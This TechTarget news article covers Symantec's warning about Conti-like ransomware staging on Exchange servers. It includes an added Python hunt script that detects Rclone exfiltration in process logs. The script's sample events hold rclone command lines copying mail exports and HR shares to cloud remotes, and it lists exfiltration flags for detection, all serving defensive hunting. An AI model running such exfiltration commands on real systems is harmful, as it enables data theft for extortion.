Symantec: Staging activity observed on Exchange servers - TechTarget

Early signs of ransomware staging have been spotted on Microsoft Exchange servers.

In a security bulletin Wednesday, Symantec warned of potential pre-ransomware activity targeting the email platform. The vendor said it "observed" threat actors attempting to install "legitimate remote control software" and other tools on the networks of targets in several U.S. sectors, including energy and healthcare. The attackers also tried to exfiltrate data from at least one target using Rclone, an open source command-line tool for copying and syncing files to cloud storage. Stolen data of that kind underpins double extortion, in which victims are pressured both by the encryption of their systems and by the threat of leaking what was taken.
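Rclone is a legitimate administration tool, so the practical question for defenders is how to spot it being used for staging and exfiltration, including when the binary has been renamed. The following hunt over process-creation telemetry is an added example for this article, not code from Symantec, Broadcom or the rclone project. The event records are constructed to resemble Windows process-creation logs (image path plus full command line); the field names "host", "image" and "cmdline" and the hostnames are assumptions, and the flag and subcommand lists are a starting point rather than an exhaustive signature.

```python
"""Hunt for Rclone-style exfiltration staging in process-creation telemetry.

Added illustration for this article, not code from Symantec/Broadcom or from
the rclone project. Event records below are constructed to resemble Windows
process-creation events; the field names are assumptions.
"""
import re
from pathlib import PureWindowsPath
from typing import Optional

# rclone verbs and long flags that commonly appear on exfiltration command lines.
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "serve", "mount", "lsd", "ls"}
RCLONE_FLAGS = {
    "--config", "--transfers", "--ignore-existing", "--auto-confirm",
    "--multi-thread-streams", "--no-check-certificate", "--max-age", "--min-size",
}
# rclone addresses storage as "<remote>:<path>". Requiring a remote name of two
# or more characters and no slash right after the colon excludes Windows drive
# letters (C:\...) and URLs (https://...).
REMOTE_RE = re.compile(r"([A-Za-z][\w-]+):([^\\/].*)?")

# Constructed sample events (not real telemetry). Hostnames are invented.
SAMPLE_EVENTS = [
    {"host": "EXCH01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"host": "EXCH01", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\ExportedMail" mega:exch01 --config C:\ProgramData\r.conf --transfers 10 -q'},
    {"host": "FS02", "image": r"C:\Users\Public\svc.exe",   # rclone renamed to blend in
     "cmdline": r"svc.exe sync D:\Shares\HR remote1:hr --ignore-existing --auto-confirm --multi-thread-streams 12"},
    {"host": "WS07", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\tmp\out.7z D:\Shares\HR"},
    {"host": "WS07", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy C:\data \\fs02\backup /MIR"},
    {"host": "WS09", "image": r"C:\Temp\up.exe",           # verb + remote, but no tell-tale flags
     "cmdline": r"up.exe copy C:\x box:stuff"},
]


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def score_event(event: dict) -> Optional[dict]:
    """Return a finding for rclone-like activity, or None when nothing matches."""
    image_name = PureWindowsPath(event["image"]).name.lower()
    args = tokenize(event["cmdline"])[1:]            # drop the program name itself
    subcmds = [a for a in args if a.lower() in RCLONE_SUBCOMMANDS]
    remotes = [a for a in args if REMOTE_RE.fullmatch(a)]
    flags = [a for a in args if a.split("=", 1)[0].lower() in RCLONE_FLAGS]

    named = image_name == "rclone.exe"               # the easy case
    behavioural = bool(subcmds and remotes)          # survives a renamed binary
    if not (named or behavioural):
        return None

    reasons = []
    if named:
        reasons.append("image name is rclone.exe")
    if behavioural:
        reasons.append(f"'{subcmds[0]}' to cloud remote '{remotes[0]}'")
        if not named:
            reasons.append(f"binary renamed to '{image_name}'")
    if flags:
        reasons.append("rclone flags: " + ", ".join(flags))

    # Verb + remote alone is suggestive; rclone-specific flags or the real name make it high.
    confidence = "high" if named or (behavioural and flags) else "medium"
    return {"host": event["host"], "image": event["image"],
            "confidence": confidence, "reasons": reasons}


def hunt(events: list) -> list:
    """Run score_event over a batch of events and return only the findings."""
    return [f for f in (score_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"[{finding['confidence'].upper()}] {finding['host']}: {finding['image']}")
        for reason in finding["reasons"]:
            print("    -", reason)
```

The behavioural match (an rclone verb plus a `remote:path` argument) is what catches the renamed copy on FS02; matching on the file name alone would miss it. In production the same logic would also want the unpacked binary's hash or its original file name from the PE version resource, and the remote names seen in findings are worth pivoting on in proxy and DNS logs.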

The final payload of this campaign, according to Symantec, remains unknown, but the activity mirrors that of a known ransomware gang.

"The observed pre-encryption attack chain and tools are consistent with public reports of recent Conti ransomware activity," the advisory said.

That includes the Cobalt Strike post-exploitation framework and credential theft tools such as Mimikatz, as well as network and domain discovery tools. Past Conti attacks have used Cobalt Strike.

Conti gained attention after ongoing attacks against U.S. companies and hospitals prompted an FBI alert in May. That same month, Conti hit data backup specialist ExaGrid for $2.6 million after exfiltrating a variety of data, including employee records. The situation appears to be escalating.

On Wednesday, a joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the National Security Agency (NSA) warned of "increased Conti ransomware attacks."

While the operators behind the pre-ransomware activity have not been identified, the staging activity itself has been confirmed. Security researcher Kevin Beaumont took to Twitter on Wednesday to separately verify Broadcom's report (Symantec is a Broadcom division).

Last month, Beaumont tracked another issue in Microsoft Exchange: a chain of attacks actively exploiting three flaws known collectively as ProxyShell (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207). The high-severity flaws enabled remote code execution, and two of them scored 9.8 on the Common Vulnerability Scoring System (CVSS). Exchange servers were also affected by ProxyLogon, a chain that begins with a server-side request forgery flaw (CVE-2021-26855). Though all four vulnerabilities were disclosed and patched, many servers remained unpatched and therefore still vulnerable.

It is unknown whether the threat actors described in Symantec's report gained access by exploiting any of the ProxyShell or ProxyLogon flaws.

September 23, 2021 at 02:33AM